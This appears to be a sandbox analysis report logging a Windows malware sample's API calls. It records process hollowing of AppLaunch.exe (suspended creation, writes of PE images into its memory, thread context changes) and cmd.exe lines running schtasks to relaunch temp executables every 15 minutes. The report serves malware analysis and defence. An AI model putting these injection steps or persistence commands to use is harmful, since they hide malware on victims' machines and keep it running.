CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2188 thread_handle: 0x0000001c process_identifier: 2184 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\WJ6Vx46.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2888 thread_handle: 0x00000128 process_identifier: 2884 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\5ih1Ry7.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2240 thread_handle: 0x0000001c process_identifier: 2236 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\nx7on92.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2684 thread_handle: 0x00000128 process_identifier: 2680 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP003.TMP\4yJ653Pm.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2284 thread_handle: 0x0000001c process_identifier: 2280 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP004.TMP\UM3WU63.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2620 thread_handle: 0x00000128 process_identifier: 2616 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP004.TMP\3sR15gk.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2328 thread_handle: 0x0000001c process_identifier: 2324 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP005.TMP\1sI72Ue2.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x00000128	1	1
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2504 thread_handle: 0x00000128 process_identifier: 2500 current_directory: filepath: track: 1 command_line: C:\Users\test22\AppData\Local\Temp\IXP005.TMP\2Dy2976.exe filepath_r: stack_pivoted: 0 creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT\|NORMAL_PRIORITY_CLASS) inherit_handles: 0 process_handle: 0x0000001c	1	1
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2372 thread_handle: 0x00000118 process_identifier: 2368 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000011c	1	1
NtGetContextThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000118	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2368 region_size: 40960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c		3221225496
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: base_address: 0x00000000 process_identifier: 2368 process_handle: 0x0000011c		0
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2408 thread_handle: 0x00000124 process_identifier: 2404 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000120	1	1
NtGetContextThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000124	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2404 region_size: 40960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000120		3221225496
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: base_address: 0x00000000 process_identifier: 2404 process_handle: 0x00000120		0
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2444 thread_handle: 0x0000012c process_identifier: 2440 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000128	1	1
NtGetContextThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x0000012c	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2440 region_size: 40960 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000128	1	0
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡$eà"0$þB `@ `¬BO`tA H.text# $ `.rsrc`&@@.reloc,@B base_address: 0x00400000 process_identifier: 2440 process_handle: 0x00000128	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: base_address: 0x00402000 process_identifier: 2440 process_handle: 0x00000128	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: P8h`4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°lStringFileInfoH000004b0Comments"CompanyName6FileDescriptionoffDef0FileVersion1.0.0.06InternalNameoffDef.exeHLegalCopyrightCopyright © 2023*LegalTrademarks>OriginalFilenameoffDef.exe.ProductNameoffDef4ProductVersion1.0.0.08Assembly Version1.0.0.0¬cêï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00406000 process_identifier: 2440 process_handle: 0x00000128	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: @3 base_address: 0x00408000 process_identifier: 2440 process_handle: 0x00000128	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2440 process_handle: 0x00000128	1	1
NtSetContextThread Nov. 3, 2023, 12:03 p.m.	registers.eip: 2005598660 registers.esp: 4062636 registers.edi: 0 registers.eax: 4211454 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000012c process_identifier: 2440	1	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x0000012c suspend_count: 1 process_identifier: 2440	1	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000188 suspend_count: 1 process_identifier: 2440	1	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x000001f8 suspend_count: 1 process_identifier: 2440	1	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000240 suspend_count: 1 process_identifier: 2440	1	0
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 2556 thread_handle: 0x00000118 process_identifier: 2552 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000011c	1	1
NtGetContextThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000118	1	0
NtAllocateVirtualMemory Nov. 3, 2023, 12:03 p.m.	process_identifier: 2552 region_size: 208896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000011c	1	0
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $à ¤ÿmY¤ÿmY¤ÿmYwnX¨ÿmYwhX2ÿmYwiX°ÿmYY¦ÿmYhXÿmYiXµÿmYnX°ÿmYwlX§ÿmY¤ÿlYðÿmY°dX´ÿmY°Y¥ÿmY°oX¥ÿmYRich¤ÿmYPELÊ¯Beà$ºA@@0@L(ààðô0à @@.textô) `.rdataxa@b.@@.dataH#°@À.rsrcàà@@.relocô0ð2 @B base_address: 0x00400000 process_identifier: 2552 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: base_address: 0x00401000 process_identifier: 2552 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: base_address: 0x00424000 process_identifier: 2552 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: ÿÿÿÿ±¿DNæ@»ÿÿÿÿ ÿÿÿÿ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þZB@¶B@¶B@¶B@¶B@¶BH¶B]B^BÈTBµB`°BC¶B(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB(ÇB¶B,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB,ÇB..þÿÿÿ þÿÿÿuLÓôk§cßÜÆí&XÔi¾üørÕ ²l¢-µsõ^}xFÝz§ÁÆ¯µ{*C]}u¸ØwÉÇiíÖ(õ[!¼h¬=Ð)ÄI\íAÙU$þ6fyôKÈ\|`@óém0Ø8v¶¤.~%âïÇ¨ÎÝ$}DÜHYØÃWæ\ÃsS?½ïGmhO3Jê¹§)ûäa/§tR¡AºÕÿê4ÿÿ° Kñ9ãÉD}E/BçGüÜgnÅÚ9ô3/çÀ4è± ßKÎóÎ3¸õxÏ´sÜz¸ãî¨7iÓUØ¶ÔHuç¢:J4Ðar0YÆA¾¼O1lKz²E½±íZJ2`Aà5²ÆÅz±0}K!tÌwþl¢T`Dñ(4UÕæ!Fæ@ÜDÔ&ÿ®\|iª¡ý-Vôü>ê;ÂxkßÀ#3J$UnT¸?µÝòg\ç4&Ú3\|Fuw¤e«ãè £èn¢±>v5å.góFÃ\|,¡9UF~£ÇÖ¡.]PÓ0ÿoÚLåÂÆC°âæêÁ'=`SËJ¤øÒ´B\|×°'ëQ(÷«¹yl)2Ô;<÷Fýä@ÊZ%×ïÅÈÄ,Qñ´=Ï£¥£PöaS;qî.Øy´}R¤à1ÔwxS±¢ RðÈ/½î5~èÛSôÆ§S½ÜÁÙ`É5Utàô¶oý«õ`6¡âòí¦a:Æ¦m!Åcà}²{îa¯Mme®2@¾@£xbÈ^¥i>JÃå)¤±JõòÓÂ3²ÝÞo<BNPòÁbVlÎ_%Ïòrøß>Ûãù´s·äîu±ü¿c\£RôKêüM¡³¾n>÷D»5Öèõ\|9!! ÊrjH«·öã^4Ì»¢ûö©[{ ÁáâàÜxÅbýD^W·Ñà§ÃêAu»vÂiâ7ÎÕèç~¨±+¹±¼ôà~\| yì8Eõ¾¹?äµ÷¼F+>`V\|B.?AVbad_exception@std@@\|B.?AVexception@std@@\|B.?AVtype_info@@ base_address: 0x0042b000 process_identifier: 2552 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: 0 H`à}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0042e000 process_identifier: 2552 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: base_address: 0x0042f000 process_identifier: 2552 process_handle: 0x0000011c	1	1
WriteProcessMemory Nov. 3, 2023, 12:03 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2552 process_handle: 0x0000011c	1	1
NtSetContextThread Nov. 3, 2023, 12:03 p.m.	registers.eip: 2005598660 registers.esp: 2227860 registers.edi: 0 registers.eax: 4198977 registers.ebp: 0 registers.edx: 0 registers.ebx: -139264 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000118 process_identifier: 2552	1	0
NtResumeThread Nov. 3, 2023, 12:03 p.m.	thread_handle: 0x00000118 suspend_count: 1 process_identifier: 2552	1	0
CreateProcessInternalW Nov. 3, 2023, 12:03 p.m.	thread_identifier: 3536 thread_handle: 0x00000300 process_identifier: 3512 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000304	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 3896 thread_handle: 0x0000030c process_identifier: 3892 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\kKAu9cP3NNRIkrC.exe" /tn "\WindowsAppPool\kKAu9cP3NNRIkrC" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000308	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 3964 thread_handle: 0x00000314 process_identifier: 3132 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000310	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 3296 thread_handle: 0x0000031c process_identifier: 3456 current_directory: filepath: C:\Windows\System32\cmd.exe track: 1 command_line: /c schtasks /create /F /sc minute /mo 15 /tr "C:\Users\test22\AppData\Local\Temp\ujtOIdrpHPHQwyp.exe" /tn "\WindowsAppPool\ujtOIdrpHPHQwyp" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000318	1	1
CreateProcessInternalW Nov. 3, 2023, 12:04 p.m.	thread_identifier: 4172 thread_handle: 0x00000324 process_identifier: 4168 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\ESPCid2h8QyYJ9b.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000320	1	1

The process powershell.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Program Files (x86)\Internet Explorer\iexplore.exe
file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

lom30.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All